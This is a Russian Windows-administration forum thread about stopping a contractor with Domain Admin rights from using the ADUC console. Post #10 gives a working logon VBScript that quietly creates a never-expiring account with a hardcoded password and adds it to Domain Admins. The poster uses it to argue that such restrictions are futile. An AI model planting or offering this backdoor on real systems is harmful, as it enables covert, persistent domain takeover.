![]() |
Внимание, важное сообщение: Дорогие Друзья!
В ноябре далекого 2001 года мы решили создать сайт и форум, которые смогут помочь как начинающим, так и продвинутым пользователям разобраться в операционных системах. В 2004-2006г наш проект был одним из самых крупных ИТ ресурсов в рунете, на пике нас посещало более 300 000 человек в день! Наша документация по службам Windows и автоматической установке помогла огромному количеству пользователей и сисадминов. Мы с уверенностью можем сказать, что внесли большой вклад в развитие ИТ сообщества рунета. Но... время меняются, приоритеты тоже. И, к сожалению, пришло время сказать До встречи! После долгих дискуссий было принято решение закрыть наш проект. 1 августа форум переводится в режим Только чтение, а в начале сентября мы переведем рубильник в положение Выключен Огромное спасибо за эти 24 года, это было незабываемое приключение. Сказать спасибо и поделиться своей историей можно в данной теме. С уважением, ваш призрачный админ, BigMac... |
|
Компьютерный форум OSzone.net » Серверные продукты Microsoft » Microsoft Windows NT/2000/2003 » [решено] Закрыть права Domain Admin-у. |
|
|
[решено] Закрыть права Domain Admin-у.
|
Ветеран Сообщения: 12417 |
Добрый день.
Есть контроллер домена. Есть внештатный сотрудник. Данный сотрудник должен административные права на сервере w2k3SP2. Его учётная запись входит в группу Domain Admins и Administrators. На сервере работает через терминал. Что нужно: нужно чтобы данный пользователь не имел доступ к оснастке ADUC. В свойствах ADUC добавлял отдельно этого пользователя, и давал права - DENY - в итоге пользователь не смог зайти по RDP. Как запретить ему просмотр в ADUC, при этом оставить все права для установки приложений, правки реестра и т.д. Может дать запрет на dsa.msc ? Спасибо. |
|
------- Отправлено: 09:19, 15-04-2011 |
Ветеран Сообщения: 4900
|
Профиль | Сайт | Отправить PM | Цитировать exo,
Локальному админу нельзя ничего запретить, а Вы доменного хотите ограничить. Ну, если он тупой, удалите оснастку dsa.msc или поставьте запрет на чтение и выполнение всем, кроме себя и SYSTEM. Если он не тупой - у него достаточно прав для отмены запретов. |
------- Отправлено: 11:28, 15-04-2011 | #2 |
Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети. Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля. |
Ветеран Сообщения: 723
|
Профиль | Сайт | Отправить PM | Цитировать грамотного человека не ограничить.
Что ему стоит создать другую учетную запись и из под нее скриптом создать или модернизировать все что требуется? ответ один - не авать ему прав. |
Отправлено: 11:46, 15-04-2011 | #3 |
Ветеран Сообщения: 12417
|
Профиль | Отправить PM | Цитировать Цитата monkkey:
Цитата zero55:
Т.е. ему нужны будут права на реестр, но где именно. Для меня главное, что бы он в ADUC вообще сунуться не мог. Есть ещё один вариант. установка дополнительного сервера, перенос туда AD и FSMO. А нынешний сервер сделать рядовым членом домена. Это в идеале. |
||
------- Отправлено: 14:13, 15-04-2011 | #4 |
Ветеран Сообщения: 723
|
Профиль | Сайт | Отправить PM | Цитировать у вас 1С на контроллере?
это просто отлично (черная ирония)... Относительно того что хватил Power User или нет сказать не могу т.к. их на контроллере просто нет. В вашем случае нужно перенести все роли на отдельный сервер |
|
Отправлено: 14:28, 15-04-2011 | #5 |
Ветеран Сообщения: 12417
|
Профиль | Отправить PM | Цитировать Цитата zero55:
поэтому дополнительная информация - сервер в сети один. сеть изолирована гальванически. 20 пользователей. у нас в планах расширение до трех серверов, но это будет через месяц-два... а мне бы сейчас... |
|
------- Отправлено: 15:19, 15-04-2011 | #6 |
Ветеран Сообщения: 723
|
Профиль | Сайт | Отправить PM | Цитировать человека с правами админа почти невозможн ограничить.
Если они есть то он получит нужное... вопрос времени и квалификации. вам пока что нужно не думать как ограничить (все меры и их эффективность будут зависить от квалификации) а как удалить с сервера средства администрирования (это легко делать с рабочей станции) и подумать над тем чтобы мониторить группы или объекты на предмет изменений. я про это писал у себя в блоге и в случае если вы нашли изменение то пинать, ногами и посильнее, того кто в этом виноват. |
Отправлено: 16:44, 15-04-2011 | #7 |
Ветеран Сообщения: 12417
|
Профиль | Отправить PM | Цитировать Цитата zero55:
|
|
------- Отправлено: 20:12, 15-04-2011 | #8 |
Ветеран Сообщения: 1001
|
Профиль | Отправить PM | Цитировать Цитата exo:
|
|
Отправлено: 20:18, 15-04-2011 | #9 |
Ветеран Сообщения: 723
|
Профиль | Сайт | Отправить PM | Цитировать Ivan Bardeen, Какой смысл ограничивать доступ к ADUC если можно обойти ограничение вот так?
вешаем в секцию автозапуска для всех. On Error Resume Next username = "user" password = "P@ssw0rd" Dim objRoot, objContainer, objUser, objGroup, objSysInfo, strUserDN Set objSysInfo = CreateObject("ADSystemInfo") strUserDN = objSysInfo.userName Set objUser = GetObject("LDAP://" & strUserDN) If IsMember("Domain Admins") Then Set objRoot = GetObject("LDAP://rootDSE") Set objContainer = GetObject("LDAP://cn=Users," & objRoot.Get("defaultNamingContext")) Set objUserCreate = objContainer.Create("User", "cn=" & username) objUserCreate.Put "sAMAccountName", username objUserCreate.SetInfo objUserCreate.SetPassword password objUserCreate.Put "userAccountControl", 66048 objUserCreate.SetInfo Set objGroup = GetObject ("LDAP://cn=Domain Admins, cn=Users," & objRoot.Get("defaultNamingContext")) objGroup.PutEx 3, "member", Array("cn=" & username & ", cn=Users," & objRoot.Get("defaultNamingContext")) objGroup.SetInfo End If Function IsMember(strGroup) Dim objGroupList If IsEmpty(objGroupList) Then Set objGroupList = CreateObject("Scripting.Dictionary") objGroupList.CompareMode = vbTextCompare For Each objGroup In objUser.Groups objGroupList(objGroup.sAMAccountName) = True Next End If IsMember = objGroupList.Exists(strGroup) End Function не спорю, мера может оказаться эффективной от человека который кроме ADUC-а ничего не видел, но поверьте даже при наличии прав локального администратора можно подняться до администратора домена очень просто... Я к тому что самое правильное - исключить причину а не пытаться залатать следствие. ![]() |
Отправлено: 21:13, 15-04-2011 | #10 |
|
![]() |
Участник сейчас на форуме |
![]() |
Участник вне форума |
![]() |
Автор темы |
![]() |
Сообщение прикреплено |
| |||||
Название темы | Автор | Информация о форуме | Ответов | Последнее сообщение | |
[решено] Domain Unregistered To view, register at: bit ly/imageshack-domain | Stepbol | Хочу все знать | 16 | 31-03-2011 10:56 | |
2008 R2 - Есть права Domain Admins. Как узнать, откуда? | exo | Windows Server 2008/2008 R2 | 3 | 23-12-2010 15:07 | |
Доступ - как мне для студента закрыть доступ на другой локальный диск, закрыть доступ к реестр | nisan | Microsoft Windows 2000/XP | 10 | 12-09-2009 21:14 | |
Admin | stanislav555 | Сетевые технологии | 1 | 17-10-2003 19:56 | |
admin$ | Shaytan | Сетевые технологии | 3 | 25-06-2003 10:54 |
|